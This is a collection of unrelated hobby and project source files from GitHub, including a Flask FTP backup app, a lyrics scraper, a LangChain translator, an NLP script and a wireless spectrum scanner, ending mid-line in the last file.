'name': 'Emma Watson',\n 'follower_count': 56,\n 'description': 'Actress',\n 'country': 'United Kingdom'\n },\n {\n 'name': 'Shawn Mendes',\n 'follower_count': 57,\n 'description': 'Musician',\n 'country': 'Canada'\n },\n {\n 'name': 'Virat Kohli',\n 'follower_count': 55,\n 'description': 'Cricketer',\n 'country': 'India'\n },\n {\n 'name': 'Gigi Hadid',\n 'follower_count': 54,\n 'description': 'Model',\n 'country': 'United States'\n },\n {\n 'name': 'Priyanka Chopra Jonas',\n 'follower_count': 53,\n 'description': 'Actress and musician',\n 'country': 'India'\n },\n {\n 'name': '9GAG',\n 'follower_count': 52,\n 'description': 'Social media platform',\n 'country': 'China'\n },\n {\n 'name': 'Ronaldinho',\n 'follower_count': 51,\n 'description': 'Footballer',\n 'country': 'Brasil'\n },\n {\n 'name': 'Maluma',\n 'follower_count': 50,\n 'description': 'Musician',\n 'country': 'Colombia'\n },\n {\n 'name': 'Camila Cabello',\n 'follower_count': 49,\n 'description': 'Musician',\n 'country': 'Cuba'\n },\n {\n 'name': 'NBA',\n 'follower_count': 47,\n 'description': 'Club Basketball Competition',\n 'country': 'United States'\n }\n]\n\nlogo = \"\"\"\n __ ___ __ \n / / / (_)___ _/ /_ ___ _____\n / /_/ / / __ `/ __ \\/ _ \\/ ___/\n / __ / / /_/ / / / / __/ / \n/_/ ///_/\\__, /_/ /_/\\___/_/ \n / / /____/_ _____ _____\n / / / __ \\ | /| / / _ \\/ ___/\n / /___/ /_/ / |/ |/ / __/ / \n/_____/\\____/|__/|__/\\___/_/ \n\"\"\"\n\nvs = \"\"\"\n _ __ \n| | / /____\n| | / / ___/\n| |/ (__ ) \n|___/____(_)\n\"\"\"\n\n# import random\nimport random\nprint(logo)\n# game start/end variable\nend_of_game = False\n# intialize item1 and item 2\nitem1 = random.choice(data)\nitem2 = random.choice(data)\n# score variable\nscore = 0\n# while not end of game:\nwhile not end_of_game:\n # intial print statements, main logo, item 1, vs logo, item 2\n print(f\"Compare A: {item1['name']}, a {item1['description']}, from {item1['country']}.\")\n print(vs)\n print(f\"Against B: {item2['name']}, a {item2['description']}, from {item2['country']}.\")\n # user input of item1 or item 2.\n more_followers = input(\"Who has more followers? Type 'A' or 'B': \")\n # compare A and B follower count, if correct choice score += 1, else end of game true and print final score. \n # if correct new item 2 assignment and assign item 2 to item 1. \n if item1['follower_count'] > item2['follower_count'] and more_followers == 'A':\n score += 1\n item1 = item2\n item2 = random.choice(data)\n print(f\"You're right! Current score: {score}\")\n # elif item1 > item2 and input = B\n elif item1['follower_count'] > item2['follower_count'] and more_followers == 'B':\n print(f\"Sorry, that's wrong. Final score: {score}\")\n end_of_game = True\n # elif item1 < item2 and input = A\n elif item1['follower_count'] < item2['follower_count'] and more_followers == 'A':\n print(f\"Sorry, that's wrong. Final score: {score}\")\n end_of_game = True\n # else item1 < item2 and input = B \n else:\n score += 1\n item1 = item2\n item2 = random.choice(data)\n print(f\"You're right! Current score: {score}\")\n","repo_name":"Deipied/100days","sub_path":"day11-20/day14/day14_higher_lower_game.py","file_name":"day14_higher_lower_game.py","file_ext":"py","file_size_in_byte":9596,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12911003618","text":"from flask import Flask\r\nfrom flask import render_template, redirect, request\r\nfrom ftplib import FTP\r\nimport os\r\nfrom backup_utils import *\r\nfrom datetime import datetime\r\n\r\napp = Flask(__name__)\r\nftp = [None]\r\n# Checking 404 error\r\n@app.errorhandler(404)\r\ndef not_found(error):\r\n\treturn \"Nothing found
        Try something else.
        \"\r\n\r\n@app.route(\"/\", methods=[\"GET\"])\r\ndef home_page():\r\n\treturn render_template(\"index.html\", invalid=False)\r\n\r\n@app.route(\"/set_ftp_address\", methods=[\"POST\"])\r\ndef set_ftp_address():\r\n\tftp_address = request.form['ftp_address']\r\n\tsuccess = False\r\n\ttry:\r\n\t\tx = FTP(ftp_address)\r\n\t\tx.login(request.form['user'], request.form['pass'])\r\n\t\tftp[0] = x\r\n\t\tsuccess = True\r\n\texcept:\r\n\t\tpass\r\n\tif not success:\r\n\t\treturn render_template(\"index.html\", invalid=True)\r\n\telse:\r\n\t\treturn redirect(\"/view_files\")\r\n\r\n@app.route(\"/view_files\", methods=[\"GET\"])\r\ndef view_files():\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=False,\r\n\t\t\t\t\t\t\tshow_backups=False,\r\n\t\t\t\t\t\t\tdatasets_listdir=[],\r\n\t\t\t\t\t\t\tbackups_listdir=[],\r\n\t\t\t\t\t\t\tdatasets_currdir='.',\r\n\t\t\t\t\t\t\tbackups_currdir='.',\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/view_files/datasets/\", methods=[\"GET\"])\r\ndef view_datasets(path):\r\n\tpath = path.replace('+','/')\r\n\tupper_dir = os.path.split(path)[0]\r\n\tif upper_dir=='':\r\n\t\tupper_dir = path\r\n\tdatasets_listdir = [(upper_dir.replace('/','+'),True)]+[(i[0],i[1]['type']=='dir') for i in ftp[0].mlsd(path)]\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=True,\r\n\t\t\t\t\t\t\tshow_backups=False,\r\n\t\t\t\t\t\t\tdatasets_listdir=datasets_listdir,\r\n\t\t\t\t\t\t\tbackups_listdir=[],\r\n\t\t\t\t\t\t\tdatasets_currdir=path.replace('/','+'),\r\n\t\t\t\t\t\t\tbackups_currdir='.',\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/view_files/backups/\", methods=[\"GET\"])\r\ndef view_backups(path):\r\n\tpath = path.replace('+','/')\r\n\tupper_dir = os.path.split(path)[0]\r\n\tif upper_dir=='':\r\n\t\tupper_dir = path\r\n\tbackups_listdir = [upper_dir.replace('/','+')]+os.listdir(path)\r\n\tbackups_listdir = [(i,os.path.isdir(os.path.join(path,i))) for i in backups_listdir]\r\n\treturn render_template(\r\n\t\t\t\t\t\t\t\"view_files.html\", \r\n\t\t\t\t\t\t\tshow_datasets=False,\r\n\t\t\t\t\t\t\tshow_backups=True,\r\n\t\t\t\t\t\t\tdatasets_listdir=[],\r\n\t\t\t\t\t\t\tbackups_listdir=backups_listdir,\r\n\t\t\t\t\t\t\tdatasets_currdir='.',\r\n\t\t\t\t\t\t\tbackups_currdir=path.replace('/','+'),\r\n\t\t\t\t\t\t\tis_valid_backup=(os.path.split(path)[0]=='backup_folder'),\r\n\t\t\t\t\t\t)\r\n\r\n@app.route(\"/backup/\", methods=[\"GET\"])\r\ndef backup_form(path):\r\n\treturn render_template(\"make_backup.html\", dataset_path=path.replace('+','/'))\r\n\r\n@app.route(\"/backup\", methods=[\"POST\"])\r\ndef backup():\r\n\tdataset_path = request.form['dataset_path']\r\n\tfull = False\r\n\tif 'full' in request.form:\r\n\t\tfull = request.form['full']=='on'\r\n\tdataset_name = os.path.split(dataset_path)[-1]\r\n\tmake_backup(ftp[0], f'backup_folder/{dataset_name}', dataset_path, full)\r\n\treturn redirect(\"/view_files\")\r\n\r\n@app.route(\"/recover/\", methods=[\"GET\"])\r\ndef recover_form(path):\r\n\tpath = path.replace('+','/')\r\n\tdataset_name = os.path.split(path)[1]\r\n\treturn render_template(\"recover.html\", backup_path=path, dataset_path=f'dataset_folder/{dataset_name}', out_folder=f'dataset_folder/{dataset_name}_recovered')\r\n\r\n@app.route(\"/recover\", methods=[\"POST\"])\r\ndef recover():\r\n\tbackup_path = request.form['backup_path']\r\n\tdataset_path = request.form['dataset_path']\r\n\tout_folder = request.form['out_folder']\r\n\treq_time = datetime(*list(map(int, (request.form['req_time']).split(' '))))\r\n\trecover_backup(ftp[0], backup_path, dataset_path, out_folder, req_time=req_time)\r\n\treturn redirect(\"/view_files\")\r\n\r\nif __name__ == \"__main__\":\r\n # app.run(host=\"0.0.0.0\", port=6000, debug=True)\r\n app.run(debug=True)\r\n\t# app.run()","repo_name":"Tanmay-Garg01/Backup-and-Backup-Policy","sub_path":"src/flask_app.py","file_name":"flask_app.py","file_ext":"py","file_size_in_byte":3696,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"4417699979","text":"from typing import Optional\nfrom validation.validate import required_keys_present, values_correct_type\n\n\ndef validate(request_body: dict) -> Optional[str]:\n \"\"\"\n Returns an error message if the /api/assessments post request\n is not valid. Else, returns None.\n\n :param request_body: The request body as a dict object\n {\n \"dateAssessed\": 1551447833, - required\n \"diagnosis\": \"patient is fine\",\n \"medicationPrescribed\": \"tylenol\",\n \"specialInvestigations\": \"bcccccccccddeeeff\",\n \"treatment\": \"b\",\n \"followupNeeded\": True, - required\n \"followupInstructions\": \"pls help, give lots of tylenol\" - required if followupNeeded = True\n }\n\n :return: An error message if request body in invalid in some way. None otherwise.\n \"\"\"\n error_message = None\n\n # Check if required keys are present\n required_keys = [\n \"followupNeeded\",\n \"dateAssessed\",\n ]\n error_message = required_keys_present(request_body, required_keys)\n if error_message is not None:\n return error_message\n\n # If patient has followupNeeded set to True, make sure followupInstructions is filled in\n if request_body.get(\"followupNeeded\") == True:\n error_message = required_keys_present(request_body, [\"followupInstructions\"])\n if error_message is not None:\n return error_message\n\n # Check that certain fields are of type int\n error_message = values_correct_type(request_body, [\"dateAssessed\"], int)\n if error_message is not None:\n return error_message\n\n return error_message\n","repo_name":"drbfraser/CRADLE-Platform","sub_path":"server/validation/assessments.py","file_name":"assessments.py","file_ext":"py","file_size_in_byte":1757,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"66"} +{"seq_id":"33513299432","text":"import pytest\n\nfrom billing_fin_payouts.models.payments import payment as payment_models\nfrom billing_fin_payouts.stq import process_payouts\nfrom . import stq_payout_common_utils\n\n\n@pytest.mark.config(BILLING_FIN_PAYOUTS_STQ_PROCESS_PAYOUTS_ENABLED=True)\n@pytest.mark.parametrize(\n \"\"\"\n static_data, dry_run_flag\n \"\"\",\n [('10_static_data.json', False), ('20_static_data.json', True)],\n ids=[\n 'skip_payout_10_payment_more_than_refund',\n 'skip_payout_20_payment_more_than_refund_DRY',\n ],\n)\nasync def test_20_process_payouts_nett_skip_task(\n stq3_context,\n load_json,\n static_data,\n dry_run_flag,\n interface_table='interface.revenues',\n):\n \"\"\"\n 10. payment & refund of service_id = 650 (SKIP_PAYOUT) and payment\n 20. payment & refund of service_id = 650 (SKIP_PAYOUT) and payment DRY\n \"\"\"\n\n pool = await stq3_context.pg.master_pool\n\n data_json = load_json(static_data)\n interface_list = [{interface_table: data_json['revenues']}]\n\n await stq_payout_common_utils.load_data(\n pool=pool, interface_list=interface_list,\n )\n\n task_info = stq_payout_common_utils.build_task_info(\n dry_run=dry_run_flag,\n payment_processor=payment_models.PaymentProcessor.OEBS,\n )\n # run task\n await process_payouts.task(\n stq3_context, task_info=task_info, client_id='1349515601',\n )\n\n await stq_payout_common_utils.check_results(pool=pool, data_json=data_json)\n","repo_name":"Alexander-Berg/2022-tests-examples-2","sub_path":"Taxi/test_billing_fin_payouts/stq/test_20_process_payouts_nett_skip.py","file_name":"test_20_process_payouts_nett_skip.py","file_ext":"py","file_size_in_byte":1486,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"71107762772","text":"import requests\n\ndef get_proxy():\n # response = requests.get(\"https://api.getproxylist.com//proxy?apiKey=62e9cf6f693a1701c2ba9497f712fb048064bc46&country=ID&protocol=http\")\n # json_response = response.json()\n # print(json_response)\n proxies = {\n 'http': f'128.199.202.122:8080',\n # 'https': f'http://{json_response[\"ip\"]}:{json_response[\"port\"]}',\n }\n print(proxies)\n return proxies","repo_name":"masnasri-a/FollowersCount","sub_path":"util/proxy.py","file_name":"proxy.py","file_ext":"py","file_size_in_byte":417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"37554502501","text":"def normalizeUsers( p ):\n\n db = p.db\n\n authUsers = db( db.auth_user.id > 0 ).select( orderby = db.auth_user.last_name )\n\n for user in authUsers:\n\n if( db( db.unique_user.last_name == user.last_name ).count() == 0 ):\n\n uniqueUserId = db.unique_user.insert( first_name = user.first_name, last_name = user.last_name )\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n\n elif( db( ( db.unique_user.last_name == user.last_name ) &\n ( db.unique_user.first_name == user.first_name) ).count() == 1 ):\n\n uniqueUserId = db( ( db.unique_user.last_name == user.last_name ) &\n ( db.unique_user.first_name == user.first_name) ).select()[0].id\n\n if( db( ( db.user_map.unique_user_id == uniqueUserId ) &\n ( db.user_map.auth_user_id == user.id ) ).count() == 0 ):\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n\n else:\n\n sameLastNames = db( db.unique_user.last_name == user.last_name ).select()\n\n found = False\n\n for person in sameLastNames:\n\n if( ( person.first_name in user.first_name ) or\n ( user.first_name in person.first_name ) ):\n\n found = True\n\n if( db( ( db.user_map.unique_user_id == person.id ) &\n ( db.user_map.auth_user_id == user.id ) ).count() == 0 ):\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = person.id )\n\n break\n\n if( found == False ):\n\n uniqueUserId = db.unique_user.insert( first_name = user.first_name, last_name = user.last_name )\n\n db.user_map.insert( auth_user_id = user.id, unique_user_id = uniqueUserId )\n","repo_name":"nonumberjim/PhylografterNeo4j","sub_path":"modules/util.py","file_name":"util.py","file_ext":"py","file_size_in_byte":1871,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"37686559980","text":"import argparse\nimport lyricsgenius\nimport pandas as pd\nimport time\nimport sys\nfrom dataset_utils import loop_and_process, name_to_file_name, read_list_from_file\nfrom genius import GENIUS_ACCESS_TOKEN\n\nraw_songs_dir = 'RAW_SONGS_DONT_DELETE'\nartist_song_split_token = ' | '\n\nartist_lyric_dir = 'raw_artist_lyrics'\n\ndef instantiate_genius():\n genius = lyricsgenius.Genius(GENIUS_ACCESS_TOKEN, timeout=30)\n genius.excluded_terms = [\"Remix\", \"Live\", \"Intro\", \"Outro\", \"Freestyle\", \"Demo\", \"Interlude\", \"Snippet\", \"Excerpts\", \"Medley\", \"MTV\", \"Radio\", \"Edit\", \"Skit\", \"Discography\"]\n return genius\n\ndef get_songs(name=None, csv=None):\n artists = pd.DataFrame([], columns=['Artist'])\n if csv is not None:\n print(\"\\n Getting lyrics for all artists in {}\".format(csv))\n with open(csv) as openfile:\n artists = openfile.readlines()\n artists = [artist.strip() for artist in artists]\n elif name is not None:\n print(\"\\n Getting lyrics for {}\".format(name))\n artists = pd.DataFrame([name], columns=['Artist'])\n else:\n print(\"No Input Artists\")\n while len(artists) > 0:\n try:\n genius = instantiate_genius()\n # functions\n def process_artist(name, bar):\n artist = genius.search_artist(name)\n songs = artist.songs\n def process_song(song, bar):\n return {\n 'title': song.title,\n 'artist': song.artist,\n 'lyrics': song.lyrics,\n 'featured_artists': [a['name'] for a in song.featured_artists]\n }\n def get_song_name(song):\n return song.artist + artist_song_split_token + song.title\n loop_and_process(songs, process_song, \"Song\", get_song_name, raw_songs_dir)\n return None\n def get_artist_name(name):\n return name\n loop_and_process(\n artists,\n process_artist,\n \"Artist\",\n get_artist_name,\n artist_lyric_dir,\n )\n except:\n e = sys.exc_info()[0]\n print(e)\n finally:\n completed_artists = read_list_from_file(\"{}/{}\".format(artist_lyric_dir, \"_LIST\"))\n for artist in completed_artists:\n if artist in artists:\n artists.remove(artist)\n\nif __name__ == \"__main__\":\n get_songs(csv='get_artists.csv')\n\n","repo_name":"Lucaskabela/artist-lyric-gen","sub_path":"src/dataset/get_songs.py","file_name":"get_songs.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"18126171252","text":"import matplotlib.pyplot as plt\nimport seaborn as sns\nfrom typing import *\nimport numpy as np\n\n# create a function which plot sine waves\ndef plot_sine_waves(sine_waves_dict: List[dict], title: str, missing_values: List[np.ndarray] = [], xlabel: str = 'time', ylabel: str = 'amplitude', style: str = 'darkgrid', figsize: tuple = (12, 6), rows: int = 3, columns: int = 1):\n \n # add figsize\n plt.figure(figsize=figsize)\n \n # plot the function\n sns.set_style(style)\n \n for i in range(len(sine_waves_dict)):\n \n # get the current time series vector\n f = sine_waves_dict[i]\n \n sns.lineplot(**f)\n \n sns.scatterplot(**f)\n \n # plot imputed values if indicated at the current index\n try:\n \n imputed_values = f['data'].copy()\n \n imputed_values[~missing_values[i]] = np.nan\n \n # sns.lineplot(imputed_values, color = 'red', label = 'missing')\n \n sns.scatterplot(imputed_values, color = 'red', label = 'imputed')\n \n except:\n \n pass \n \n # add title\n plt.title(title)\n \n # add labels\n plt.xlabel(xlabel)\n \n plt.ylabel(ylabel)\n \n # add legend\n if len(sine_waves_dict) > 1:\n \n plt.legend()\n \n plt.show()\n \n","repo_name":"Oumar199/Climatic_time_series","sub_path":"climatic-time-series/climatic_time_series/utils/plot_lines.py","file_name":"plot_lines.py","file_ext":"py","file_size_in_byte":1361,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"16882043632","text":"from langchain.chat_models import ChatOpenAI\nfrom langchain.llms import ChatGLM\nfrom langchain.chains import LLMChain\nfrom langchain import PromptTemplate\nfrom langchain.prompts.chat import (\n ChatPromptTemplate,\n SystemMessagePromptTemplate,\n HumanMessagePromptTemplate,\n)\n\nfrom utils import LOG\n\n\nclass TranslationChain:\n def __init__(\n self,\n model_name: str = \"gpt-3.5-turbo\",\n glm_endpoint: str = \"http://127.0.0.1:8000\",\n verbose: bool = True,\n ):\n # 初始化 OpenAI 模型的 chain\n self.init_openai_chain(model_name, verbose)\n # 初始化 GLM 模型的 chain\n self.init_glm_chain(glm_endpoint, verbose)\n\n def init_openai_chain(self, model_name, verbose):\n # 创建小说风格的翻译 chain,将 temperature 设置为 0.3,保持一定的变化\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using novel style.\"\"\"\n self.openai_novel_style_chain = self.generate_openai_chain(\n system_prompt, 0.3, model_name, verbose\n )\n\n # 创建新闻稿风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using the style of a press release.\"\"\"\n self.openai_press_style_chain = self.generate_openai_chain(\n system_prompt, 0, model_name, verbose\n )\n\n # 创建文艺作家风格的翻译 chain,将 temperature 设置为 0.7,让翻译内容多变\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translate the following content from {source_language} to {target_language} using the style of a literary writer.\"\"\"\n self.openai_literary_style_chain = self.generate_openai_chain(\n system_prompt, 0.7, model_name, verbose\n )\n\n # 创建无风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n system_prompt = \"\"\"You are a translation expert, proficient in various languages. \\n\n Translates {source_language} to {target_language}.\"\"\"\n self.openai_none_style_chain = self.generate_openai_chain(\n system_prompt, 0, model_name, verbose\n )\n\n def generate_openai_chain(\n self,\n system_promt,\n temperature,\n model_name,\n verbose,\n ) -> LLMChain:\n # 翻译任务指令始终由 System 角色承担\n system_message_prompt = SystemMessagePromptTemplate.from_template(system_promt)\n\n # 待翻译文本由 Human 角色输入\n human_template = \"{text}\"\n human_message_prompt = HumanMessagePromptTemplate.from_template(human_template)\n\n # 使用 System 和 Human 角色的提示模板构造 ChatPromptTemplate\n chat_prompt_template = ChatPromptTemplate.from_messages(\n [system_message_prompt, human_message_prompt]\n )\n\n chat = ChatOpenAI(\n model_name=model_name, temperature=temperature, verbose=verbose\n )\n return LLMChain(llm=chat, prompt=chat_prompt_template, verbose=verbose)\n\n def init_glm_chain(self, endpoint, verbose):\n # 创建小说风格的翻译 chain,将 temperature 设置为 3,保持一定的变化(GLM 的 temperature 范围是 0~10)\n prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用小说文体的措辞风格:\\n{text}\"\"\"\n self.glm_novel_style_chain = self.generate_glm_chain(\n prompt_str, 3, endpoint=endpoint, verbose=verbose\n )\n\n # 创建新闻稿风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用新闻稿的措辞风格:\\n{text}\"\"\"\n self.glm_press_style_chain = self.generate_glm_chain(\n prompt_str, 0, endpoint=endpoint, verbose=verbose\n )\n\n # 创建文艺作家风格的翻译 chain,将 temperature 设置为 7,让翻译内容多变\n prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language},尽量使用文艺作家的措辞风格:\\n{text}\"\"\"\n self.glm_literary_style_chain = self.generate_glm_chain(\n prompt_str, 7, endpoint=endpoint, verbose=verbose\n )\n\n # 创建无风格的翻译 chain,将 temperature 设置为 0,以保持翻译结果的稳定性\n prompt_str = \"\"\"假设你是一位擅长各国语言的翻译专家,将下面的内容从{source_language}翻译成{target_language}:\\n{text}\"\"\"\n self.glm_none_style_chain = self.generate_glm_chain(\n prompt_str, 0, endpoint=endpoint, verbose=verbose\n )\n\n def generate_glm_chain(\n self,\n prompt_str,\n temperature,\n endpoint,\n verbose,\n ) -> LLMChain:\n # GLM 没有 system 角色,使用简单的 PromptTemplate 封装即可\n prompt = PromptTemplate.from_template(prompt_str)\n chat = ChatGLM(endpoint_url=endpoint, temperature=temperature, verbose=verbose)\n return LLMChain(llm=chat, prompt=prompt, verbose=verbose)\n\n def run(\n self,\n text,\n source_language,\n target_language,\n style,\n model: str = \"OpenAI\",\n ) -> (str, bool):\n result = \"\"\n try:\n if model == \"OpenAI\":\n # 使用 OpenAI 模型翻译\n result = self.run_openai(text, source_language, target_language, style)\n else:\n # 使用 GLM 模型翻译\n result = self.run_glm(text, source_language, target_language, style)\n\n LOG.debug(f\"translation result: {result}\")\n except Exception as e:\n LOG.error(f\"An error occurred during translation: {e}\")\n return result, False\n\n return result, True\n\n def run_openai(\n self,\n text,\n source_language,\n target_language,\n style,\n ):\n if style == \"小说\":\n LOG.debug(f\"openai novel style translation\")\n return self.openai_novel_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"新闻稿\":\n LOG.debug(f\"openai press style translation\")\n return self.openai_press_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"文艺作家\":\n LOG.debug(f\"openai literary style translation\")\n return self.openai_literary_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n else:\n LOG.debug(f\"openai none style translation\")\n return self.openai_none_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n\n def run_glm(\n self,\n text,\n source_language,\n target_language,\n style,\n ):\n if style == \"小说\":\n LOG.debug(f\"glm novel style translation\")\n return self.glm_novel_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"新闻稿\":\n LOG.debug(f\"glm press style translation\")\n return self.glm_press_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n elif style == \"文艺作家\":\n LOG.debug(f\"glm literary style translation\")\n return self.glm_literary_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n else:\n LOG.debug(f\"glm none style translation\")\n return self.glm_none_style_chain.run(\n {\n \"text\": text,\n \"source_language\": source_language,\n \"target_language\": target_language,\n }\n )\n","repo_name":"991glasses/llm-learning-homework","sub_path":"langchain/openai-translator/ai_translator/translator/translation_chain.py","file_name":"translation_chain.py","file_ext":"py","file_size_in_byte":9232,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"32998024554","text":"from pydrive.auth import GoogleAuth\nfrom pydrive.drive import GoogleDrive\nfrom picamera import PiCamera\nfrom datetime import datetime\n\n\ngauth = GoogleAuth()\ngauth.LoadCredentialsFile(\"mycreds.txt\")\nif gauth.credentials is None:\n gauth.LocalWebserverAuth()\nelif gauth.access_token_expired:\n gauth.Refresh()\nelse:\n gauth.Authorize()\ngauth.SaveCredentialsFile(\"mycreds.txt\")\n\ndrive = GoogleDrive(gauth)\ncamera = PiCamera()\n\nfilename = datetime.now().strftime(\"%H%M%S\")+'.jpg'\nprint(filename)\ncamera.capture('/home/pi/Desktop/'+filename)\n\nfile1 = drive.CreateFile()\nfile1.SetContentFile(filename)\nfile1.Upload()\n","repo_name":"siba987/chef","sub_path":"upload.py","file_name":"upload.py","file_ext":"py","file_size_in_byte":617,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"17656911516","text":"class Node:\n def __init__(self, data):\n self.data = data\n self.next = None\n\n\nclass Linked_list:\n def __init__(self):\n self.head = None\n self.tail = None\n \n def find_k(self):\n curr = self.head\n\n k_curr = self.head\n\n for _ in range(6):\n if k_curr == None:\n return None\n k_curr = k_curr.next\n \n while k_curr is not None:\n k_curr = k_curr.next\n curr = curr.next\n\n return curr.data\n ","repo_name":"Chris940915/study_algorithm","sub_path":"코딩 인터뷰 완전 분석/02 Linked_list/2_2.py","file_name":"2_2.py","file_ext":"py","file_size_in_byte":526,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"66"} +{"seq_id":"22621094074","text":"from collections import Counter\n\n#import nltk\nfrom konlpy.corpus import kolaw\nfrom konlpy.tag import *\nfrom konlpy.utils import concordance, pprint\nimport MySQLdb\nimport matplotlib \nmatplotlib.use('Agg')\n\ndb = MySQLdb.connect(host=\"localhost\", user =\"ice-kms\", passwd=\"kkms1234\", db=\"scraping\", charset='utf8')\ncursor = db.cursor(MySQLdb.cursors.DictCursor)\ncursor.execute(\"set names utf8\")\n\ndb.query(\"set character_set_connection=utf8;\")\ndb.query(\"set character_set_server=utf8;\")\ndb.query(\"set character_set_client=utf8;\")\ndb.query(\"set character_set_results=utf8;\")\ndb.query(\"set character_set_database=utf8;\")\n\ncursor.execute(\"set names utf8\")\nsql = \"select Content from Test3 where Articlenumber=5\"\ncursor.execute(sql.encode('utf8'))\n\nrows = cursor.fetchall()\n\ndocument2=''\n\nfor row in rows:\n\tprint(row['Content'].decode('utf8'))\n\tdocument2 = document2+ row['Content'].decode('utf8')\n\n#print(document2)\n\npos = Twitter().pos(document2+\"'문재인은 바보이다'\")\nprint(pos)\narray=[]\n\n#cnt = Counter(pos)\nfor poss in pos:\n\tif poss[1] == \"Noun\" or poss[1] == \"Number\":\n\t\tarray.append(poss[0])\n\nprint(array)\n\n#print('nchars :', len(document2))\n#print('ntokens :', len(document2.split()))\n#print('nmorphs :', len(set(pos)))\n#print('\\nTop 50 frequent morphemes:'); pprint(cnt.most_common(30))\n#ko = nltk.Text(pos, name='명사추출')\n##output_file = open('pos0.txt', 'w')\n##for row in cnt.most_common(3000):\n##\toutput_file.write(str(row)+'\\n')\n\n##output_file.close()\n#ko.vocab()\n#ko.plot(50)\n#ko.savefig('word.png')\n#ko.show()\n#x = pos\n#y = cnt\n#plt.plot(x,y)\n#plt.show()\n","repo_name":"JeongHyeon-Kim/Extracting-Representative-Keyword-with-LDA-and-Word-Distance","sub_path":"Pre-processing/pos.py","file_name":"pos.py","file_ext":"py","file_size_in_byte":1576,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"66"} +{"seq_id":"11954902445","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Jan 29 17:19:19 2016\n\n@author: olbrich\n\"\"\"\n#import os\nimport time\nimport queue\nimport numpy as np\nfrom psd import scanner as psd_scanner\nfrom psd import helper as psd_helper\nfrom psd import plotter as psd_plotter\n\n\n# define scan params\niface = 'wlan0'\nrunt = 30\nival = 0.05\ndebug = False\nspectral_mode = 'background' # 'background', 'manual'\nspectral_count = 8 # default=8\nspectral_period = 255 # default=255, max=255\nspectral_fft_period = 15 # default=15, max=15\nspectral_short_repeat = 1 # default=1\n\n\n# configure scan device\npsd_helper.scan_dev_configure(\n iface=iface,\n mode=spectral_mode,\n count=spectral_count,\n period=spectral_period,\n fft_period=spectral_fft_period,\n short_repeat=spectral_short_repeat\n)\n\n# set timer\nstart_time = time.time()\nend_time = start_time + runt\n\n# create plotter object\nplt = psd_plotter.Plotter()\n\n# create scanner queue\npsdq = queue.Queue()\n\n# start scan\nprint(\"Start scanning PSD for %d sec in %d sec intervals on interface %s...\" % (runt, ival, iface))\nif (spectral_mode == 'background'):\n psd_helper.scan_dev_start(iface)\n\nival_cnt = 0\nwhile time.time() < end_time:\n\n if (spectral_mode == 'manual'):\n psd_helper.scan_dev_start(iface)\n\n # start scanner in a separate thread???\n psd_scanner.scan(iface, psdq, debug)\n\n # collect all samples from last scan interval\n qsize = psdq.qsize()\n print(\"ival_cnt: %d, qsize: %d\" % (ival_cnt, qsize))\n ret = np.full((56, qsize), (np.nan), dtype=np.float64)\n\n #while not myQueue.empty():\n #psd_pkt = myQueue.get()\n #print(\"Receiving PSD header: %s\" % psd['header'])\n\n for i in range(0, qsize, 1):\n psd_pkt = psdq.get()\n ret[:,i] = psd_pkt['psd_vector']\n\n # calculate statistics for last scan interval\n avg = 10*np.log10(np.mean(10**np.divide(ret, 10), axis=1))\n env = 